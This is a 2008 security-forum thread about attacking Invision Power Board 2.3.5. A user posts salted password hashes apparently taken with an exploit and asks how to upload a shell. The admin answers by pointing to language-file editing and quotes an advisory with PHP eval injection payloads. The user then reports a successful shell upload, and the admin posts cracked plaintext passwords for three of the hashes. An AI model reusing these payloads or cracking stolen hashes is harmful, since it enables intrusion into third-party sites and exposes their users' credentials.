Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
November 30, 2023
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 285
Members: 0
Total: 285
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other hashes -> some questions on ipb
Post new topic  Reply to topic View previous topic :: View next topic 
some questions on ipb
PostPosted: Tue Sep 23, 2008 4:59 pm Reply with quote
king424
Regular user
Regular user
 
Joined: Apr 03, 2008
Posts: 24




first:i use ipb2.3.5 exp got some hash,but cann't crack them~
Hash: 4d86409a2fd8dffc4e60c915f83fde77 Salt: c~cfN
Hash: 5a76d0a32d9e713d3f86fef9de08ed10 Salt: 2bzLS
Hash: 6611271cb4fef84dee04fac706bba8bf Salt: G?dvO
Hash: 2482566d9798bd8b66fb7d6ca343e0d1 Salt: ;"u??
Hash: 6afebdbc3da0e5fe025c8c80190d6acf Salt: ]}5td
Hash: b5aa5095177b1fe1d7aba35ddf7c238e Salt: $QmZ;
Hash: 4d1c98ad4b31e1518d0c9036d1922b41 Salt: |3|uE
Hash: 8813d3647b5e23815d80f659ce9a1886 Salt: YgiMC
Hash: 69d047edafb621fc1024366a39a26f01 Salt: &tg0~
Hash: f3df6fde904cfd2905099dba3dfb5a33 Salt: .Qpc}
Hash: 3389e60cf59abffec47f28f42d87d7cd Salt: lq30x
Hash: 06e5fdb9d0b1378cc5b863d3abcb29be Salt: L/(1V
Hash: 0c0a9aba4d194b3b3ddd6458673b7bbe Salt: hM!v%
Hash: 0554c34fc91fd76785e2713f7cfa22c1 Salt: +`{+u
Hash: ea2c88dc1dd3ad67738e72c90677a1c9 Salt: D{|a?
Hash: 6c8bc609808a88090bb90d7e5ea07620 Salt: hA80]
Hash: f5523704af4d3a00c2d7fe59cdc345be Salt: Rv/3W
Hash: 25ffb0cc85ac580f59112fe3ef76ec31 Salt: v|{|=
Hash: e42bde777cffec3766c4e387cd69406b Salt: PkyRo
Hash: 44352b5a1741ec1c382f0aa77f7cdb8e Salt: 8f+n)
Hash: 9a5cc5f20a4d7a61ec25c83e7fa827a5 Salt: meshI
Hash: f2b932b4f7550f3d4ad527abb7ab43b6 Salt: AAo.)

The second:ipb2.3.5 how to upload shell?

thanks for you help!
View user's profile Send private message
PostPosted: Tue Sep 23, 2008 8:45 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Admin CP --> language management. This will let you manipulate language files and inject your own php code. For details look at Darkfig's advisory Smile

http://acid-root.new.fr/?0:18
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Sep 24, 2008 6:05 am Reply with quote
king424
Regular user
Regular user
 
Joined: Apr 03, 2008
Posts: 24




waraxe wrote:
Admin CP --> language management. This will let you manipulate language files and inject your own php code. For details look at Darkfig's advisory Smile

http://acid-root.new.fr/?0:18


thanks for waraxe.i upload shell Successfull~~
Very Happy
but these hash cracked failure Rolling Eyes
View user's profile Send private message
PostPosted: Wed Sep 24, 2008 7:55 am Reply with quote
martin1
Regular user
Regular user
 
Joined: Sep 21, 2008
Posts: 17




any chance one of you's can gimme some advice with this. As the link you supplied dont work Confused
View user's profile Send private message
PostPosted: Wed Sep 24, 2008 8:53 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




martin1 wrote:
any chance one of you's can gimme some advice with this. As the link you supplied dont work Confused


http://acid-root.new.fr/?0:18

Code:


       Title:   Invision Power Board <= 2.3.5
                Multiple Vulnerabilities and Security Bypass

      Vendor:   http://www.invisionpower.com/community/board/

    Advisory:   http://acid-root.new.fr/?0:18
      Author:   DarkFig < gmdarkfig (at) gmail (dot) com >

 Released on:   2008/08/29
   Changelog:   2008/08/30

     Summary:   Introduction
      Blind SQL Injection
                Insecure SQL Password Usage
                Admin Session Hijacking
      Deep Recursion Protection Bypass
      Code Execution
      Miscellanious

  Risk level:   Medium / High


...
...

 VI - CODE EXECUTION

  The ACP allows admins to manage languages, they can
  choose the default language, import a new one, and edit
  them. Let's take a look in the file "sources/action_admin/
  languages.php":

   65| switch($this->ipsclass->input['code'])
   66| {
   ..|
   88|  case 'doedit':
   89|    $this->ipsclass->admin->cp_permission_check(...);
   90|    $this->save_langfile();
  110|  break;
  ...|
  935|    function save_langfile()
  936|    {
  ...|
  957|      $lang_file = CACHE_PATH."cache/lang_cache/".$row['ldir'].
  ...|                 "/".$this->ipsclass->input['lang_file'];
  958|
  959|      if (! file_exists( $lang_file ) )  ...
  ...|
  963|
  964|      if (! is_writeable( $lang_file ) ) ...
  ...|
  969|      $barney = array();
  970|       
  971|      foreach ($this->ipsclass->input as $k => $v)
  972|      {
  973|        if ( preg_match( "/^XX_(\S+)$/", $k, $match ) )
  974|        {
  975|          if ( isset($this->ipsclass->input[ $match[0] ]) )
  976|          {
  977|       $v = str_replace("'", "'", stripslashes($_POST[$match[0]]));
  978|       $v = str_replace("<", "<",  $v );
  979|       $v = str_replace(">", ">", $v );
  980|       $v = str_replace("&", "&", $v );
  981|       $v = str_replace("\r", "", $v );
  982|             
  983|       $barney[ $match[1] ] = $v;
  984|          }
  985|        }
  986|      }

  As you can see, there's several replacements which are
  made. Some HTML entities are converted to their applicable
  characters. The "stripslashes()" function is also called.
  But we don't really care about that, this will not cause
  a problem, this was just to show you how user's inputs
  are treated. Now let's see how the change is made:
 
   993|    $start = "<?php\n\n".'$lang = array('."\n";
   994|
   995|  foreach($barney as $key => $text)
   996|  {
   997|    $text   = preg_replace("/\n{1,}$/", "", $text);
   998|    $start .= "\n'".$key."'  => \"".str_replace( '"', '\"', $text)."\",";
   999|  }
  1000|       
  1001|  $start .= "\n\n);\n\n?".">";
  1002|
  1003|  if ($fh = fopen( $lang_file, 'w') )
  1004|  {
  1005|     fwrite($fh, $start );
  1006|     fclose($fh);
  1007|  }
 
  So, there's a protection against double quotes, not all
  escape characters. There are several ways to bypass this
  protection.

  The first method, is to play with what we call "dynamic
  variables". With two $, we can execute PHP code.
  Example: ${${@eval($_SERVER[HTTP_SH])}}

  The second one, is to use another escape character, a
  backslash (\) will do the stuff. The attacker must change
  two inputs. Example:

   First input: hello\
  Second input: ); @eval($_SERVER[HTTP_SH]); /*

View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Sep 24, 2008 10:23 am Reply with quote
martin1
Regular user
Regular user
 
Joined: Sep 21, 2008
Posts: 17




Thanks waraxe Wink
View user's profile Send private message
PostPosted: Wed Sep 24, 2008 12:32 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Plaintext of 4d1c98ad4b31e1518d0c9036d1922b41 is forever
Plaintext of 44352b5a1741ec1c382f0aa77f7cdb8e is mugello
Plaintext of 06e5fdb9d0b1378cc5b863d3abcb29be is brabak


Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Thu Sep 25, 2008 5:36 am Reply with quote
king424
Regular user
Regular user
 
Joined: Apr 03, 2008
Posts: 24




thanks again! Laughing
anyone can crack any others?
View user's profile Send private message
PostPosted: Fri Sep 26, 2008 7:08 am Reply with quote
donkey
Regular user
Regular user
 
Joined: Sep 26, 2008
Posts: 11




how did u get the salt of that thing ?
View user's profile Send private message
some questions on ipb
  www.waraxe.us Forum Index -> All other hashes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.150 Seconds